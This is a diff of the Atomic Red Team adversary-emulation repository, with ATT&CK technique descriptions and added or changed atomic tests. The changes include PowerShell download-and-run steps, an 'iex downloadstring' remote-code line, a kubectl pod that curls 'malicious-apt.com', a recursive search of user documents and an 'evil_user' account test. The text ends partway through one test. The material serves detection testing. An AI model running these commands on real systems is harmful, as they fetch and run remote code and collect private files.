Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
|
||||
|
||||
Each <code>.timer</code> file must have a corresponding <code>.service</code> file with the same name, e.g., <code>example.timer</code> and <code>example.service</code>. <code>.service</code> files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to <code>/etc/systemd/system/</code> and <code>/usr/lib/systemd/system</code> while user level are written to <code>~/.config/systemd/user/</code>.
|
||||
Each <code>.timer</code> file must have a corresponding <code>.service</code> file with the same name, e.g., <code>example.timer</code> and <code>example.service</code>. <code>.service</code> files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to <code>/etc/systemd/system/</code> and <code>/usr/lib/systemd/system</code> while user level are written to <code>\~/.config/systemd/user/</code>.
|
||||
|
||||
An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.(Citation: Falcon Sandbox smp: 28553b3a9d)
|
||||
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Executable
BIN
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -103,10 +103,10 @@ atomic_tests:
|
||||
if (Test-Path "c:\Program Files\Process Hacker 2\#{processhacker_exe}") {exit 0} else {exit 1}
|
||||
get_prereq_command: |-
|
||||
Write-Host Downloading Process Hacker
|
||||
New-Item -Type Directory "C:\Temp\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://versaweb.dl.sourceforge.net/project/processhacker/processhacker2/processhacker-2.39-setup.exe" -OutFile "C:\Temp\ExternalPayloads\processhacker-2.39-setup.exe"
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://versaweb.dl.sourceforge.net/project/processhacker/processhacker2/processhacker-2.39-setup.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\processhacker-2.39-setup.exe"
|
||||
Write-Host Installing Process Hacker
|
||||
Start-Process "c:\Temp\ExternalPayloads\processhacker-2.39-setup.exe" -Wait -ArgumentList "/s"
|
||||
Start-Process "PathToAtomicsFolder\..\ExternalPayloads\processhacker-2.39-setup.exe" -Wait -ArgumentList "/s"
|
||||
executor:
|
||||
command: Start-Process -FilePath "$Env:ProgramFiles\Process Hacker 2\#{processhacker_exe}"
|
||||
name: powershell
|
||||
@@ -125,15 +125,15 @@ atomic_tests:
|
||||
dependencies:
|
||||
- description: PCHunter must be present in device
|
||||
prereq_command: |
|
||||
if (Get-ChildItem -Path C:\ -Include *PCHunter64* -File -Recurse -ErrorAction SilentlyContinue) {exit 0} else {exit 1}
|
||||
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free\#{pchunter64_exe}) {exit 0} else {exit 1}
|
||||
get_prereq_command: |-
|
||||
Write-Host Downloading PC Hunter
|
||||
New-Item -Type Directory "C:\Temp\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://www.snapfiles.com/directdl/PCHunter_free.zip" -OutFile "C:\Temp\ExternalPayloads\PCHunter_free.zip"
|
||||
Expand-Archive -LiteralPath 'C:\Temp\ExternalPayloads\PCHunter_free.zip' -DestinationPath C:\Temp\ExternalPayloads
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://www.snapfiles.com/directdl/PCHunter_free.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free.zip"
|
||||
Expand-Archive -LiteralPath 'PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free.zip' -DestinationPath PathToAtomicsFolder\..\ExternalPayloads
|
||||
Write-Host Unzipping Installing Process Hunter
|
||||
executor:
|
||||
command: Start-Process -FilePath "C:\Temp\ExternalPayloads\PCHunter_free\#{pchunter64_exe}"
|
||||
command: Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free\#{pchunter64_exe}"
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Launch Taskmgr from cmd to View running processes
|
||||
|
||||
Binary file not shown.
@@ -52,7 +52,7 @@ atomic_tests:
|
||||
autosuid:
|
||||
description: Path to the autosuid shell script
|
||||
type: path
|
||||
default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
|
||||
default: PathToAtomicsFolder/../ExternalPayloads/AutoSUID.sh
|
||||
autosuid_url:
|
||||
description: Path to download autosuid shell script
|
||||
type: url
|
||||
@@ -82,7 +82,7 @@ atomic_tests:
|
||||
linenum:
|
||||
description: Path to the LinEnum shell script
|
||||
type: path
|
||||
default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh
|
||||
default: PathToAtomicsFolder/../ExternalPayloads/LinEnum.sh
|
||||
linenum_url:
|
||||
description: Path to download LinEnum shell script
|
||||
type: url
|
||||
|
||||
@@ -4,7 +4,7 @@
|
||||
|
||||
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
|
||||
|
||||
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Adversaries may delete their commands from these logs by manually clearing the history (<code>history -c</code>) or deleting the bash history file <code>rm ~/.bash_history</code>.
|
||||
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>\~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Adversaries may delete their commands from these logs by manually clearing the history (<code>history -c</code>) or deleting the bash history file <code>rm \~/.bash_history</code>.
|
||||
|
||||
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (<code>clear logging</code> and/or <code>clear history</code>).(Citation: US-CERT-TA18-106A) On ESXi servers, command history may be manually removed from the `/var/log/shell.log` file.(Citation: Broadcom ESXi Shell Audit)
|
||||
|
||||
|
||||
@@ -4,7 +4,9 @@
|
||||
|
||||
Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
|
||||
|
||||
The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling)
|
||||
The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling)
|
||||
|
||||
DNS beaconing may be used to send commands to remote systems via DNS queries. A DNS beacon is created by tunneling DNS traffic (i.e. [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)). The commands may be embedded into different DNS records, for example, TXT or A records.(Citation: OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government) DNS beacons may be difficult to detect because the beacons infrequently communicate with infected devices.(Citation: DNS Beacons) Infrequent communication conceals the malicious DNS traffic with normal DNS traffic.
|
||||
|
||||
</blockquote>
|
||||
|
||||
|
||||
@@ -2,9 +2,9 @@
|
||||
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1082)
|
||||
<blockquote>
|
||||
|
||||
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
|
||||
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use this information to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. This behavior is distinct from [Local Storage Discovery](https://attack.mitre.org/techniques/T1680) which is an adversary's discovery of local drive, disks and/or volumes.
|
||||
|
||||
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. As an example, adversaries with user-level access can execute the <code>df -aH</code> command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. <code>show version</code>).(Citation: US-CERT-TA18-106A) On ESXi servers, threat actors may gather system information from various esxcli utilities, such as `system hostname get`, `system version get`, and `storage filesystem list` (to list storage volumes).(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: Varonis)
|
||||
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. Adversaries may leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. <code>show version</code>).(Citation: US-CERT-TA18-106A) On ESXi servers, threat actors may gather system information from various esxcli utilities, such as `system hostname get` and `system version get`.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: Varonis)
|
||||
|
||||
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)
|
||||
|
||||
|
||||
+124
-3
@@ -26,6 +26,10 @@ Some files and directories may require elevated or specific user permissions to
|
||||
|
||||
- [Atomic Test #7 - ESXi - Enumerate VMDKs available on an ESXi Host](#atomic-test-7---esxi---enumerate-vmdks-available-on-an-esxi-host)
|
||||
|
||||
- [Atomic Test #8 - Identifying Network Shares - Linux](#atomic-test-8---identifying-network-shares---linux)
|
||||
|
||||
- [Atomic Test #9 - Recursive Enumerate Files And Directories By Powershell](#atomic-test-9---recursive-enumerate-files-and-directories-by-powershell)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -194,8 +198,8 @@ rm #{output_file}
|
||||
<br/>
|
||||
|
||||
## Atomic Test #5 - Simulating MAZE Directory Enumeration
|
||||
This test emulates MAZE ransomware's ability to enumerate directories using Powershell.
|
||||
Upon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window.
|
||||
This test emulates MAZE ransomware's ability to enumerate directories using Powershell.
|
||||
Upon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window.
|
||||
See https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
@@ -222,7 +226,7 @@ Get-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -app
|
||||
Get-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append #{File_to_output}
|
||||
Get-ChildItem -Path "${env:ProgramFiles(x86)}" -erroraction silentlycontinue | Out-File -append #{File_to_output}
|
||||
$UsersFolder = "$env:homedrive\Users\"
|
||||
foreach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue)
|
||||
foreach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue)
|
||||
{
|
||||
foreach ($secondarydirectory in $folderarray)
|
||||
{Get-ChildItem -Path "$UsersFolder/$directory/$secondarydirectory" -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}}
|
||||
@@ -344,4 +348,121 @@ Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -O
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #8 - Identifying Network Shares - Linux
|
||||
If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares.
|
||||
Attackers may then attempt to access these shares for lateral movement or data exfiltration.
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 361fe49d-0c19-46ec-a483-ccb92d38e88e
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
|
||||
|
||||
```sh
|
||||
findmnt -t nfs
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #9 - Recursive Enumerate Files And Directories By Powershell
|
||||
Adversary attempting to discover and collect sensitive documents and archives
|
||||
from a user’s system. The test recursively enumerates common user folders
|
||||
(Documents, Downloads, Desktop, OneDrive) for file types of interest such as .pdf, .doc,
|
||||
.docx, .xls, .xlsx, .txt, .zip, .rar, and .7z.
|
||||
This behavior is similar to malware like LOSTKEYS used by COLDRIVER in January 2025,
|
||||
where attackers perform targeted file discovery to support strategic intelligence collection https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 95a21323-770d-434c-80cd-6f6fbf7af432
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| output_file | File to output results. | string | $env:TEMP\T1083-Enumerate-net.txt|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```powershell
|
||||
$out = "#{output_file}"
|
||||
$dirsFilter = @('Documents','Downloads','Desktop','OneDrive')
|
||||
$exts = @('.pdf','.doc','.docx','.xls','.xlsx','.txt','.zip','.rar','.7z')
|
||||
$userProfile = [Environment]::GetFolderPath('UserProfile')
|
||||
$tr = [System.Collections.Generic.List[string]]::new()
|
||||
|
||||
function MatchesExtension($path) {
|
||||
try {
|
||||
$e = [System.IO.Path]::GetExtension($path).ToLower()
|
||||
return $exts -contains $e
|
||||
} catch { return $false }
|
||||
}
|
||||
|
||||
function Scan-Dir($root) {
|
||||
try {
|
||||
$match = $false
|
||||
foreach ($f in $dirsFilter) { if ($root -like "*$f*") { $match = $true; break } }
|
||||
if (-not $match) { return }
|
||||
|
||||
[System.IO.Directory]::EnumerateFiles($root) | ForEach-Object {
|
||||
if (MatchesExtension $_) {
|
||||
$fi = [System.IO.FileInfo]::new($_)
|
||||
$tr.Add("[File] $_ Size:$($fi.Length) LastWrite:$($fi.LastWriteTime)")
|
||||
}
|
||||
}
|
||||
|
||||
[System.IO.Directory]::EnumerateDirectories($root) | ForEach-Object {
|
||||
Scan-Dir $_
|
||||
}
|
||||
} catch [System.UnauthorizedAccessException] {
|
||||
$tr.Add("[AccessDenied] $root")
|
||||
} catch {
|
||||
$tr.Add("[Error] $root => $($_.Exception.Message)")
|
||||
}
|
||||
}
|
||||
|
||||
[System.IO.Directory]::EnumerateDirectories($userProfile) | ForEach-Object { Scan-Dir $_ }
|
||||
|
||||
# Ensure output dir exists
|
||||
$outDir = [System.IO.Path]::GetDirectoryName($out)
|
||||
if (-not [string]::IsNullOrEmpty($outDir) -and -not (Test-Path $outDir)) {
|
||||
New-Item -Path $outDir -ItemType Directory -Force | Out-Null
|
||||
}
|
||||
|
||||
# Write results
|
||||
$tr | Out-File -FilePath $out -Encoding UTF8
|
||||
Write-Output "Enumeration complete. Results written to: $out"
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
Remove-Item -Path "#{output_file}" -ErrorAction SilentlyContinue
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -91,8 +91,8 @@ atomic_tests:
|
||||
- name: Simulating MAZE Directory Enumeration
|
||||
auto_generated_guid: c6c34f61-1c3e-40fb-8a58-d017d88286d8
|
||||
description: |
|
||||
This test emulates MAZE ransomware's ability to enumerate directories using Powershell.
|
||||
Upon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window.
|
||||
This test emulates MAZE ransomware's ability to enumerate directories using Powershell.
|
||||
Upon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window.
|
||||
See https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
|
||||
supported_platforms:
|
||||
- windows
|
||||
@@ -108,7 +108,7 @@ atomic_tests:
|
||||
Get-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append #{File_to_output}
|
||||
Get-ChildItem -Path "${env:ProgramFiles(x86)}" -erroraction silentlycontinue | Out-File -append #{File_to_output}
|
||||
$UsersFolder = "$env:homedrive\Users\"
|
||||
foreach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue)
|
||||
foreach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue)
|
||||
{
|
||||
foreach ($secondarydirectory in $folderarray)
|
||||
{Get-ChildItem -Path "$UsersFolder/$directory/$secondarydirectory" -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}}
|
||||
@@ -176,7 +176,7 @@ atomic_tests:
|
||||
cli_script:
|
||||
description: Path to script with file discovery commands
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1083\src\esxi_file_discovery.txt
|
||||
default: PathToAtomicsFolder\T1083\src\esxi_file_discovery.txt
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
@@ -191,3 +191,82 @@ atomic_tests:
|
||||
echo "" | "#{plink_file}" "#{vm_host}" -ssh -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
|
||||
name: command_prompt
|
||||
elevation_required: false
|
||||
- name: Identifying Network Shares - Linux
|
||||
auto_generated_guid: 361fe49d-0c19-46ec-a483-ccb92d38e88e
|
||||
description: |
|
||||
If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares.
|
||||
Attackers may then attempt to access these shares for lateral movement or data exfiltration.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
findmnt -t nfs
|
||||
name: sh
|
||||
- name: Recursive Enumerate Files And Directories By Powershell
|
||||
auto_generated_guid: 95a21323-770d-434c-80cd-6f6fbf7af432
|
||||
description: |
|
||||
Adversary attempting to discover and collect sensitive documents and archives
|
||||
from a user’s system. The test recursively enumerates common user folders
|
||||
(Documents, Downloads, Desktop, OneDrive) for file types of interest such as .pdf, .doc,
|
||||
.docx, .xls, .xlsx, .txt, .zip, .rar, and .7z.
|
||||
This behavior is similar to malware like LOSTKEYS used by COLDRIVER in January 2025,
|
||||
where attackers perform targeted file discovery to support strategic intelligence collection https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: File to output results.
|
||||
type: string
|
||||
default: '$env:TEMP\T1083-Enumerate-net.txt'
|
||||
executor:
|
||||
name: powershell
|
||||
command: |
|
||||
$out = "#{output_file}"
|
||||
$dirsFilter = @('Documents','Downloads','Desktop','OneDrive')
|
||||
$exts = @('.pdf','.doc','.docx','.xls','.xlsx','.txt','.zip','.rar','.7z')
|
||||
$userProfile = [Environment]::GetFolderPath('UserProfile')
|
||||
$tr = [System.Collections.Generic.List[string]]::new()
|
||||
|
||||
function MatchesExtension($path) {
|
||||
try {
|
||||
$e = [System.IO.Path]::GetExtension($path).ToLower()
|
||||
return $exts -contains $e
|
||||
} catch { return $false }
|
||||
}
|
||||
|
||||
function Scan-Dir($root) {
|
||||
try {
|
||||
$match = $false
|
||||
foreach ($f in $dirsFilter) { if ($root -like "*$f*") { $match = $true; break } }
|
||||
if (-not $match) { return }
|
||||
|
||||
[System.IO.Directory]::EnumerateFiles($root) | ForEach-Object {
|
||||
if (MatchesExtension $_) {
|
||||
$fi = [System.IO.FileInfo]::new($_)
|
||||
$tr.Add("[File] $_ Size:$($fi.Length) LastWrite:$($fi.LastWriteTime)")
|
||||
}
|
||||
}
|
||||
|
||||
[System.IO.Directory]::EnumerateDirectories($root) | ForEach-Object {
|
||||
Scan-Dir $_
|
||||
}
|
||||
} catch [System.UnauthorizedAccessException] {
|
||||
$tr.Add("[AccessDenied] $root")
|
||||
} catch {
|
||||
$tr.Add("[Error] $root => $($_.Exception.Message)")
|
||||
}
|
||||
}
|
||||
|
||||
[System.IO.Directory]::EnumerateDirectories($userProfile) | ForEach-Object { Scan-Dir $_ }
|
||||
|
||||
# Ensure output dir exists
|
||||
$outDir = [System.IO.Path]::GetDirectoryName($out)
|
||||
if (-not [string]::IsNullOrEmpty($outDir) -and -not (Test-Path $outDir)) {
|
||||
New-Item -Path $outDir -ItemType Directory -Force | Out-Null
|
||||
}
|
||||
|
||||
# Write results
|
||||
$tr | Out-File -FilePath $out -Encoding UTF8
|
||||
Write-Output "Enumeration complete. Results written to: $out"
|
||||
cleanup_command: |
|
||||
Remove-Item -Path "#{output_file}" -ErrorAction SilentlyContinue
|
||||
|
||||
Binary file not shown.
@@ -90,6 +90,8 @@ Files can also be transferred using various [Web Service](https://attack.mitre.o
|
||||
|
||||
- [Atomic Test #38 - Download a file with OneDrive Standalone Updater](#atomic-test-38---download-a-file-with-onedrive-standalone-updater)
|
||||
|
||||
- [Atomic Test #39 - Curl Insecure Connection from a Pod](#atomic-test-39---curl-insecure-connection-from-a-pod)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -1950,4 +1952,52 @@ Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Please
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #39 - Curl Insecure Connection from a Pod
|
||||
Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
|
||||
against a target URL. The pod is automatically deleted after execution.
|
||||
|
||||
**Supported Platforms:** Containers
|
||||
|
||||
|
||||
**auto_generated_guid:** 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| pod_name | K8s pod_name to execute the command in | string | atomic-insecure-curl|
|
||||
| remote_url | Remote URL to curl | string | https://malicious-apt.com|
|
||||
| image_name | Name of the docker image | string | curlimages/curl|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `bash`!
|
||||
##### Description: kubectl must be installed and configured
|
||||
##### Check Prereq Commands:
|
||||
```bash
|
||||
which kubectl
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```bash
|
||||
echo "kubectl must be installed manually"
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -1268,4 +1268,35 @@ atomic_tests:
|
||||
Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore
|
||||
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
elevation_required: false
|
||||
- name: Curl Insecure Connection from a Pod
|
||||
auto_generated_guid: 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
|
||||
description: |
|
||||
Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
|
||||
against a target URL. The pod is automatically deleted after execution.
|
||||
supported_platforms:
|
||||
- containers
|
||||
input_arguments:
|
||||
pod_name:
|
||||
description: K8s pod_name to execute the command in
|
||||
type: string
|
||||
default: atomic-insecure-curl
|
||||
remote_url:
|
||||
description: Remote URL to curl
|
||||
type: string
|
||||
default: https://malicious-apt.com
|
||||
image_name:
|
||||
description: Name of the docker image
|
||||
type: string
|
||||
default: curlimages/curl
|
||||
dependencies:
|
||||
- description: kubectl must be installed and configured
|
||||
get_prereq_command: |
|
||||
echo "kubectl must be installed manually"
|
||||
prereq_command: |
|
||||
which kubectl
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}
|
||||
Binary file not shown.
@@ -21,7 +21,7 @@ Typically, management services over commonly used ports are used when password s
|
||||
|
||||
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
|
||||
|
||||
In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.
|
||||
In order to avoid detection thresholds, adversaries may deliberately throttle password spraying attempts to avoid triggering security alerting. Additionally, adversaries may leverage LDAP and Kerberos authentication attempts, which are less likely to trigger high-visibility events such as Windows "logon failure" event ID 4625 that is commonly triggered by failed SMB connection attempts.(Citation: Microsoft Storm-0940)
|
||||
|
||||
</blockquote>
|
||||
|
||||
|
||||
@@ -8,6 +8,8 @@ Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the
|
||||
|
||||
Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)
|
||||
|
||||
Adversaries may also establish persistence on network by configuring a Tor hidden service on a compromised system. Adversaries may utilize the tool `ShadowLink` to facilitate the installation and configuration of the Tor hidden service. Tor hidden service is then accessible via the Tor network because `ShadowLink` sets up a .onion address on the compromised system. `ShadowLink` may be used to forward any inbound connections to RDP, allowing the adversaries to have remote access.(Citation: The BadPilot campaign) Adversaries may get `ShadowLink` to persist on a system by masquerading it as an MS Defender application.(Citation: Russian threat actors dig in, prepare to seize on war fatigue)
|
||||
|
||||
</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
Binary file not shown.
@@ -6,6 +6,8 @@ Adversaries may create a local account to maintain access to victim systems. Loc
|
||||
|
||||
For example, with a sufficient level of access, the Windows <code>net user /add</code> command can be used to create a local account. In Linux, the `useradd` command can be used, while on macOS systems, the <code>dscl -create</code> command can be used. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as <code>username</code>, to ESXi servers via `esxcli system account add`, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)
|
||||
|
||||
Adversaries may also create new local accounts on network firewall management consoles – for example, by exploiting a vulnerable firewall management system, threat actors may be able to establish super-admin accounts that could be used to modify firewall rules and gain further access to the network.(Citation: Cyber Security News)
|
||||
|
||||
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
|
||||
|
||||
</blockquote>
|
||||
@@ -30,6 +32,8 @@ Such accounts may be used to establish secondary credentialed access that do not
|
||||
|
||||
- [Atomic Test #9 - Create a new Windows admin user via .NET](#atomic-test-9---create-a-new-windows-admin-user-via-net)
|
||||
|
||||
- [Atomic Test #10 - Create a Linux user via kubectl in a Pod](#atomic-test-10---create-a-linux-user-via-kubectl-in-a-pod)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -369,4 +373,52 @@ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #10 - Create a Linux user via kubectl in a Pod
|
||||
Launches a short-lived Alpine pod and creates a Linux user inside the pod.
|
||||
The pod is automatically deleted after execution.
|
||||
|
||||
**Supported Platforms:** Containers
|
||||
|
||||
|
||||
**auto_generated_guid:** d9efa6c7-6518-42b2-809a-4f2a8e242b9b
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| pod_name | K8s pod_name to execute the command in | string | atomic-linux-useradd|
|
||||
| username | Username of the user to create inside the pod | string | evil_user|
|
||||
| image_name | Name of the docker image | string | alpine|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
